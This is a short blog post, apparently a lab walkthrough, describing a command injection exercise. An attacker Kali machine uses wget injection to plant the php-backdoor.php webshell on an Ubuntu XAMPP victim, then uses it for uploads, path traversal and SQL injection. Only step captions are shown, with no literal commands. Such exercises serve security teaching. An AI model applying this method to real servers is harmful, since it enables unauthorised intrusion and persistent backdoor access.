Thursday, April 12, 2018

Command Injection (III): Webshell -> php-backdoor.php

- Layout for this exercise:

- This exercise is based on the previous one:

- In this exercise let's assume the most simple scenario, where the web server folder at the Ubuntu victim machine is readable, while in other exercises we study more complex scenarios:

- Starting XAMPP at Ubuntu:

- Also, let's check that ci.php is present at the victim side:

- ci.php is accessible from the attacker Kali Linux via web:

- Now, going to /user/share/webshells, Kali has got a bunch of prepared webshells to be used as attacking tools for different languages:

- Going to the php folder we find php-backdoor.php:

- Setting a simple HTTP server at the attacker's side:

- Checking that the wget command is available at the victim side:

- Now, the wget command is injected crafting the URL at Kali's browser (notice that is Kali's IP):

- The transaction is successful, because php-backdoor.php is now present at the victim side:

- The simple HTTP server at Kali records the successful transaction:

- Finally, executing php-backdoor.php remotely via the browser is easy.

- Let's notice that there are several attacking options available, for instance uploading files , traversing paths, and also executing SQL injections:

- For instance, traversing to folders where comprimising files are present:

- Also, other malicious files could be uploaded, even setting the destination folder:

- The attack is successful because the malicious file has been uploaded to the victim by injecting commands to the attacker's browser: